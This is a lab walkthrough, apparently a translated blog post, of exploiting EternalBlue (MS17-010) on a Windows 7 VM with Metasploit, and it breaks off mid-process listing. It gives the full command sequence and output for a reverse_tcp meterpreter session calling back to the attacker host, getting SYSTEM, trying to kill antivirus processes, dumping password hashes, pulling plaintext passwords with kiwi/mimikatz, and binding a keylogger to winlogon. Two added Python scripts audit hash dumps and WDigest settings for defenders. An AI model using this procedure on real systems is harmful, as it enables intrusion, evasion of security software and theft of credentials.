Exploiting EternalBlue (MS17-010)

Lab environment:

Kali VM: attacker machine

Win7 VM: target machine

Main tool: metasploit

## Getting a meterpreter session

  1. Search metasploit for modules using the keyword 17-010:

msf5 > search 17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

  2. Use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to verify that the vulnerability is present:

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.8.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The line "Host is likely VULNERABLE to MS17-010!…" shows that the vulnerability is present.

  3. Exploit the vulnerability to get a reverse shell and a meterpreter session.

    360 Security Guard intercepts the exploit, so the target machine must not have 360 installed, or 360 must be turned off.

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124
lhosts => 192.168.8.124
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.8.124:4444 
[*] 192.168.8.129:445 - Connecting to target for exploitation.
[+] 192.168.8.129:445 - Connection established for exploitation.
[+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.8.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.8.129:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.8.129:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.8.129:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.8.129
[*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400
[-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError

meterpreter > 

## Confirming the user's privileges

meterpreter > shell
Process 2132 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>exit
exit
meterpreter > 

The session has SYSTEM privileges.

Alternatively, run getuid directly in meterpreter to check the current user:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

## Privilege escalation

If the session is not SYSTEM, try escalating privileges:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

The line "got system via technique…" indicates that escalation succeeded.

## Disabling antivirus software

  1. Customize the wordlist

Edit the wordlist /usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt and add the process names of the antivirus software to be stopped, such as zhudongfangyu.exe and 360tray.exe, all in lowercase.

  2. Kill the antivirus processes
  • killav

Do not use run killav; the post module is used instead:

meterpreter > run post/windows/manage/killav 

[*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
[-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
[*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
[-] Failed to terminate '360Tray.exe' (PID: 3408).
[+] A total of 2 process(es) were discovered, 0 were terminated.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


Even though the session is SYSTEM, the processes were not killed. Frustrating.

  • powershell

Dropping into the target with the shell command and then running powershell to open an interactive PowerShell prompt does not work: commands typed there get no response, so PowerShell commands cannot be run on the target that way. The following method is used instead.

meterpreter > load 
load espia       load kiwi        load peinjector  load sniffer
load extapi      load lanattacks  load powershell  load unhook
load incognito   load mimikatz    load python      load winpmem
meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > help powershell

Powershell Commands
===================

    Command             Description
    -------             -----------
    powershell_execute  Execute a Powershell command string
    powershell_import   Import a PS1 script or .NET Assembly DLL
    powershell_shell    Create an interactive Powershell prompt


meterpreter > powershell_shell 
PS > Get-Process

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
    173      20    13964       9544   117     0.23   1732 360leakfixer
    584      55    99776     105588   317     8.49   3944 360Safe
   1936     152   164724      20452   577    12.62   3408 360Tray
     32       5     1088       3100    49     0.02    696 conhost
     31       5     1084       3108    49     0.05   1448 conhost
    515      12     2100       4360    83     0.50    364 csrss
    574      15    10624      10204   178     2.64    468 csrss
    195      16     4328       6932    57     0.56   1936 dllhost
    126      14    51340      38100   130     1.05   2592 dwm
    706      49    28940      46708   247     7.92   2632 explorer
     64       7     1040       2832    35     0.03   1496 Ext2Srv
      0       0        0         24     0               0 Idle
     40       5      940       2392    21     0.00   1552 imdsksvc
    772      24     4304       8300    45     2.09    572 lsass
    204      10     2768       5024    33     0.11    580 lsm
     50       8      996       2952    47     0.03   1584 metsvc
    148      17     3476       4484    61     0.06   2192 msdtc
    257      22    51456      55128   558     0.30   1608 powershell
    271      22    51200      55432   559     0.22   3936 powershell
    778      55    34844      16556   147     1.06   2076 SearchIndexer
    228      14     5372       6572    44     2.15    556 services
    405      31     9896      14852   163     0.94   3712 sesvc
     30       2      452        776     4     0.12    276 smss
    306      31    10076      13592   137     0.98   1856 SoftMgrLite
    648      54    84828      76780   639     0.90   1284 spoolsv
    508      17     5880       7316    44     1.26    548 svchost
    361      14     4364       7272    46     2.40    688 svchost
    268      16     3840       6712    38     0.34    792 svchost
    472      23    17756      14100    84     3.07    860 svchost
    427      24    66132      68028   162    13.32    940 svchost
   1183      52    20824      24108   408     6.65    984 svchost
    571      35    14256      12320    92     1.93   1144 svchost
    143      15     2612      13328    51     0.34   1292 svchost
    257      30     5788       7968    49     0.53   1332 svchost
     94       8     1648       3592    47     0.02   1916 svchost
    103      13     1872       5000    34     0.14   1992 svchost
    314      41    61952       5296   129     0.73   2916 svchost
    646       0      112        368     3               4 System
    205      16     7412       8980    83     0.27   2504 taskhost
    127      12     3640      13272   112     7.52   3440 taskmgr
    280      23    11824        912   128     1.67   1016 updater
     87      10     5224       3744    62     0.08   1632 VGAuthService
     56       6     1436       2748    39     0.00    748 vmacthlp
    310      25    10320      11500   100     5.88   1688 vmtoolsd
    244      22    10488      15192   125     6.63   2788 vmtoolsd
     82      10     1560       3988    57     0.09    456 wininit
    118      10     2964       5708    66     0.25    520 winlogon
    230      15     7052      10468    52            1208 WmiPrvSE
    382      35    10520      10848   105     1.05   1064 ZhuDongFangYu


PS > Stop-Process 1064
ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
ERROR: ???? ?:1 ??: 13
ERROR: + Stop-Process <<<<  1064
ERROR:     + CategoryInfo          : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
EERROR:     + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR: 
PS > 

Here the powershell extension is loaded in meterpreter and the powershell_shell command opens an interactive PowerShell prompt. Get-Process shows that the ZhuDongFangYu process has id 1064, but Stop-Process still fails to kill it. More frustration.

Disabling the firewall

## Information gathering

### Getting detailed information about the target host

  • run scraper

Collects system information, environment variables, network configuration, services, users, domain, password hashes, and so on.

meterpreter > run scraper
[*] New session on 192.168.8.129:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.8.129:445...
meterpreter > 

  • run winenum

Part of the output duplicates run scraper.

meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.1.8:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
[*] Checking if PC is a Virtual Machine ........
[*] 	This is a VMware Workstation/Fusion Virtual Machine
[*] 	UAC is Disabled
[*] Running Command List ...
[*] 	running command arp -a
[*] 	running command ipconfig /displaydns
[*] 	running command ipconfig /all
[*] 	running command route print
[*] 	running command cmd.exe /c set
[*] 	running command netstat -ns
[*] 	running command netstat -nao
[*] 	running command net accounts
[*] 	running command netstat -vb
[*] 	running command net view
[*] 	running command net localgroup
[*] 	running command net group administrators
[*] 	running command net session
[*] 	running command net share
[*] 	running command net group
[*] 	running command net user
[*] 	running command net view /domain
[*] 	running command netsh firewall show config
[*] 	running command net localgroup administrators
[*] 	running command tasklist /svc
[*] 	running command netsh wlan show drivers
[*] 	running command gpresult /SCOPE USER /Z
[*] 	running command netsh wlan show networks mode=bssid
[*] 	running command gpresult /SCOPE COMPUTER /Z
[*] 	running command netsh wlan show profiles
[*] 	running command netsh wlan show interfaces
[*] Running WMIC Commands ....
[*] 	running command wmic group list
[*] 	running command wmic service list brief
[*] 	running command wmic netlogin get name,lastlogon,badpasswordcount
[*] 	running command wmic logicaldisk get description,filesystem,name,size
[*] 	running command wmic useraccount list
[*] 	running command wmic netuse get name,username,connectiontype,localname
[*] 	running command wmic nteventlog get path,filename,writeable
[*] 	running command wmic volume list brief
[*] 	running command wmic share get name,path
[*] 	running command wmic netclient list brief
[*] 	running command wmic qfe
[*] 	running command wmic startup list full
[*] 	running command wmic rdtoggle list
[*] 	running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
meterpreter > 

### Listing the applications installed on the target host

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on PC

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Advanced Archive Password Recovery                              4.54.110.4540
 Elcomsoft Forensic Disk Decryptor                               1.00.110.1392
 Ext2Fsd 0.69                                                    0.69
 Java 8 Update 121 (64-bit)                                      8.0.1210.13
 Java Auto Updater                                               2.8.181.13
 Java SE Development Kit 8 Update 121 (64-bit)                   8.0.1210.13
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2 (CHS)                            4.7.03062
 Microsoft .NET Framework 4.7.2 (简体中文)                           4.7.03062
 Microsoft Visual C++ 2005 Redistributable                       8.0.61187
 Microsoft Visual C++ 2005 Redistributable (x64)                 8.0.61186
 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523  9.0.30729.7523
 Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219     10.0.40219
 Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219     10.0.40219
 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706     14.15.26706
 Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706     14.15.26706
 Python 2.7.13 (64-bit)                                          2.7.13150
 Python 3.7.3 Add to Path (64-bit)                               3.7.3150.0
 Python 3.7.3 Core Interpreter (64-bit)                          3.7.3150.0
 Python 3.7.3 Development Libraries (64-bit)                     3.7.3150.0
 Python 3.7.3 Documentation (64-bit)                             3.7.3150.0
 Python 3.7.3 Executables (64-bit)                               3.7.3150.0
 Python 3.7.3 Standard Library (64-bit)                          3.7.3150.0
 Python 3.7.3 Tcl/Tk Support (64-bit)                            3.7.3150.0
 Python 3.7.3 Test Suite (64-bit)                                3.7.3150.0
 Python 3.7.3 Utility Scripts (64-bit)                           3.7.3150.0
 Python 3.7.3 pip Bootstrap (64-bit)                             3.7.3150.0
 Python Launcher                                                 3.7.6657.0
 SecureCRT V6.2.3.313 汉化版                                        V6.2.3.313 汉化版
 SilentEye                                                       0.4.1
 Stellar Phoenix JPEG Repair                                     5.0.0.0
 Stellar Phoenix Photo Recovery Professional                     8.0.0.1
 Update for Microsoft .NET Framework 4.7.2 (KB4087364)           1
 Update for Microsoft .NET Framework 4.7.2 (KB4457035)           1
 VMware Tools                                                    10.0.0.2977863
 WinRAR 5.11 (64-位)                                              5.11.0
 Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86    10.1.15254.1
 Windows SDK AddOn                                               10.1.0.0
 搜狗输入法 9.1正式版                                                    9.1.0.2657


[+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
meterpreter > 

### Listing the users on the target host

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 1

Current Logged Users
====================

 SID                                           User
 ---                                           ----
 S-1-5-18                                      NT AUTHORITY\SYSTEM
 S-1-5-21-1244648496-323992457-611466280-1000  PC\XinSai


[+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt

Recently Logged Users
=====================

 SID                                           Profile Path
 ---                                           ------------
 S-1-5-18                                      %systemroot%\system32\config\systemprofile
 S-1-5-19                                      C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                      C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-1244648496-323992457-611466280-1000  C:\Users\XinSai
 S-1-5-21-1244648496-323992457-611466280-501   C:\Users\Guest


meterpreter > 

### Dumping user password hashes

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
meterpreter > 

The format is username:SID:LM hash:NTLM hash:::; a tool such as John the Ripper can then be used to crack the hashes.
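From the defender's side, the same dump is an audit artifact. The Python script below is an added example, not part of the original post: it parses lines in the hashdump layout (the second field is the RID, the last component of the account SID) and reports the conditions worth acting on, without cracking anything. It uses the two well-known empty-password hash values (the LM hash of the empty string, which is also what appears when LM storage is disabled, and the NT hash of the empty password). The sample dumps are constructed; the first mirrors the output above, the second (the `backup` account and the LM value for XinSai shown later by creds_all) is invented to exercise the other checks.

```python
"""
Added example (not from the original post): parse hashdump/pwdump lines of
the form  username:RID:LM_hash:NT_hash:::  and report the weak-credential
conditions a defender cares about, using the well-known empty-password
hash values rather than any cracking.
"""
from collections import defaultdict

# LM hash of the empty string: this is what appears when LM hashes are not
# stored at all (the default since Vista) or the password is blank.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the layout of the hashdump output above.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
"""

# Second constructed sample: a host that still stores LM hashes and where two
# accounts share one NT hash (same password). The "backup" account is invented.
SAMPLE_DUMP_LEGACY = """
XinSai:1000:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
"""


def parse_hashdump(text):
    """Return a list of {user, rid, lm, nt} dicts; raise on malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed hashdump line: {line!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed hashdump line: {line!r}")
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def audit_hashdump(text):
    """
    Findings:
      blank_password  - accounts whose NT hash is the empty-password hash
                        (hashdump does not show whether the account is
                        disabled, so check that separately)
      lm_hash_stored  - accounts with a real LM hash, i.e. the host still
                        stores the weak LM format (NoLMHash not enforced)
      shared_password - groups of accounts with an identical NT hash
    """
    entries = parse_hashdump(text)
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_password": []}
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for label, dump in (("page sample", SAMPLE_DUMP), ("legacy sample", SAMPLE_DUMP_LEGACY)):
        print(label, audit_hashdump(dump))
```

On the dump above, Administrator and Guest come back as blank-password accounts (both are disabled by default on Windows 7, which the dump cannot tell you), no LM hashes are stored, and no two accounts share a password.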

### Dumping user plaintext passwords

Meterpreter has built-in extensions; type load and then press TAB twice to list them:

meterpreter > load 
load espia       load kiwi        load peinjector  load sniffer
load extapi      load lanattacks  load powershell  load unhook
load incognito   load mimikatz    load python      load winpmem
meterpreter > load 

  • kiwi extension

Load the kiwi extension, then run the creds_all command.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.1.1 20180925 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain  LM                                NTLM                              SHA1
--------  ------  --                                ----                              ----
XinSai    PC      f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
PC$       WORKGROUP  (null)
XinSai    PC         admin

tspkg credentials
=================

Username  Domain  Password
--------  ------  --------
XinSai    PC      admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
XinSai    PC         admin
pc$       WORKGROUP  (null)


meterpreter > 

The password of user XinSai is "admin".
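The plaintext comes from the wdigest and tspkg providers keeping the logon password in LSASS memory, which Windows 7 does by default. The mitigation is the UseLogonCredential value under the WDigest key (honoured on Windows 7/8/2008 R2/2012 once KB2871997 is installed; Windows 8.1/2012 R2 and later default to off). The Python function below is an added example, not part of the original post: it decides from the output of `reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential` whether plaintext caching is active. The sample outputs are constructed, and the `nt_version` and `kb2871997_installed` parameters are assumptions of this example (the caller supplies them from inventory data).

```python
r"""
Added example (not from the original post): decide whether WDigest plaintext
credential caching, the source of the "admin" password shown by creds_all,
is active on a host, from the output of
    reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
"""
import re

# Constructed sample outputs of the reg query command above.
SAMPLE_DISABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x0
"""
SAMPLE_ENABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x1
"""
SAMPLE_ABSENT = """
ERROR: The system was unable to find the specified registry key or value.
"""

# NT versions that cache WDigest plaintext by default, i.e. when the value is
# absent: 6.1 = Windows 7 / Server 2008 R2, 6.2 = Windows 8 / Server 2012.
# Windows 8.1 (6.3) / Server 2012 R2 and later default to off.
LEGACY_DEFAULT_ON = {"6.1", "6.2"}


def parse_use_logon_credential(reg_output):
    """Return the DWORD as an int, or None if the value is not present."""
    m = re.search(r"UseLogonCredential\s+REG_DWORD\s+0x([0-9A-Fa-f]+)", reg_output)
    return int(m.group(1), 16) if m else None


def wdigest_caches_plaintext(reg_output, nt_version, kb2871997_installed=True):
    """
    nt_version is the "major.minor" string of the host, e.g. "6.1" for the
    Windows 7 target on this page. An explicit registry value wins; otherwise
    the OS default applies. On 6.1/6.2 the value is only honoured once
    KB2871997 is installed, so on an unpatched host a 0 changes nothing.
    """
    legacy = nt_version in LEGACY_DEFAULT_ON
    if legacy and not kb2871997_installed:
        return True  # the value is ignored without the update
    value = parse_use_logon_credential(reg_output)
    if value is not None:
        return value != 0
    return legacy


if __name__ == "__main__":
    for label, out in (("disabled", SAMPLE_DISABLED), ("enabled", SAMPLE_ENABLED), ("absent", SAMPLE_ABSENT)):
        print(label, "-> caches plaintext:", wdigest_caches_plaintext(out, "6.1"))
```

For the Windows 7 host on this page the value is absent by default, so the function reports caching as active; setting UseLogonCredential to 0 (with KB2871997 present) is what removes the plaintext from LSASS.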

  • mimikatz extension

Load the mimikatz extension, then run wdigest:

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;816638  NTLM       PC            xman666        mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;372325  NTLM       PC            XinSai         mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;996     Negotiate  WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;48926   NTLM                                    mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;999     NTLM       WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)

meterpreter > 

No password was obtained this way, however; this attempt failed.

### Traffic sniffing

#### Keylogging

  • keyscan_dump

Meterpreter can also log keystrokes on the target device. Keylogging mainly involves these three commands:

keyscan_start: start the keystroke logger

keyscan_dump: show the captured keystrokes

keyscan_stop: stop the keystroke logger

However, the keylogger usually needs to be bound to a target process. Below, Meterpreter is bound to winlogon.exe so that keystrokes are captured in the logon process and the user's password is obtained.

  1. Bind to the process

meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]                                                     
 4     0     System                  x64   0                                      
 240   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 328   320   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 340   908   dwm.exe                 x64   3                                      C:\Windows\system32\Dwm.exe
 384   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 412   320   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 524   412   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 540   412   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 548   412   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 616   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 648   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 712   524   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 744   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 816   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 908   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 960   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 1032  1176  QwdqufeOMpX.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\QwdqufeOMpX.exe
 1088  4060  LogonUI.exe             x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
